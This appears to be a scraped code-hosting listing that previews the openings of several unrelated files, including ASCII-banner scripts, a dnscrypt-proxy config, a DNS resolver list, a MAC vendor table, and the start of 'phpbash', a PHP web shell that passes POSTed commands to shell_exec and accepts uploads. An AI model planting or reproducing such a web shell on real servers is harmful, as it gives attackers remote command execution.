This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
#____ ____ __ | |
#\ \ / /____ _____/ |_ ___________ | |
# \ Y // __ \_/ ___\ __\/ _ \_ __ \ | |
# \ /\ ___/\ \___| | ( <_> ) | \/ | |
# \___/ \___ >\___ >__| \____/|__| | |
# \/ \/ | |
#----Authored by Vector/NullArray | |
############################################## | |
import os |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
*____ ____ __ | |
*\ \ / /____ _____/ |_ ___________ | |
* \ Y // __ \_/ ___\ __\/ _ \_ __ \ | |
* \ /\ ___/\ \___| | ( <_> ) | \/ | |
* \___/ \___ >\___ >__| \____/|__| | |
* \/ \/ | |
* ############################################## */ | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
#____ ____ __ | |
#\ \ / /____ _____/ |_ ___________ | |
# \ Y // __ \_/ ___\ __\/ _ \_ __ \ | |
# \ /\ ___/\ \___| | ( <_> ) | \/ | |
# \___/ \___ >\___ >__| \____/|__| | |
# \/ \/ | |
#--Licensed under GNU GPL 3 | |
#----Authored by Vector/NullArray | |
############################################## |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
############################################## | |
# # | |
# dnscrypt-proxy configuration # | |
# # | |
############################################## | |
listen_addresses = [] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#____ ____ __ | |
#\ \ / /____ _____/ |_ ___________ | |
# \ Y // __ \_/ ___\ __\/ _ \_ __ \ | |
# \ /\ ___/\ \___| | ( <_> ) | \/ | |
# \___/ \___ >\___ >__| \____/|__| | |
# \/ \/ | |
#--Licensed under GNU GPL 3 | |
#----Authored by Vector/NullArray | |
# | |
# Do't forget to run this as well. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
keylength=8 | |
algo=$1 | |
[[ "$algo" = "aes" ]] && keylength=16 | |
[[ "$algo" = "3des" ]] && keylength=24 | |
encfile=$(mktemp -t _encXXXXXX) && \ | |
keyfile=$(mktemp -t _encXXXXXX) && \ | |
dd if=/dev/urandom of="$keyfile" bs="$keylength" count=1 >/dev/null 2>&1 && \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
if [ "$(uname)" == 'Darwin' ]; then | |
OS='Mac' | |
elif [ "$(expr substr $(uname -s) 1 5)" == 'Linux' ]; then | |
OS='Linux' | |
else | |
echo "Your platform ($(uname -a)) is not supported." | |
exit 1 | |
fi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* phpbash by Alexander Reid (Arrexel) */ | |
if (ISSET($_POST['cmd'])) { | |
$output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1")); | |
foreach ($output as $line) { | |
echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>"; | |
} | |
die(); | |
} else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) { | |
$filename = $_FILES["file"]["name"]; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
aaflalo-me-gcp | |
aaflalo-me | |
adguard-dns-family | |
adguard-dns | |
adguard-dns-family-doh | |
adguard-dns-doh | |
adguard-dns-family-ipv6 | |
adguard-dns-ipv6 | |
ads-securedns-doh | |
ads-securedns-ipv6-doh |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Misc MACs: | |
Num MAC Vendor | |
--- --- ------ | |
0000 - 00:00:00 - XEROX CORPORATION | |
0001 - 00:00:01 - XEROX CORPORATION | |
0002 - 00:00:02 - XEROX CORPORATION | |
0003 - 00:00:03 - XEROX CORPORATION | |
0004 - 00:00:04 - XEROX CORPORATION | |
0005 - 00:00:05 - XEROX CORPORATION | |
0006 - 00:00:06 - XEROX CORPORATION |
NewerOlder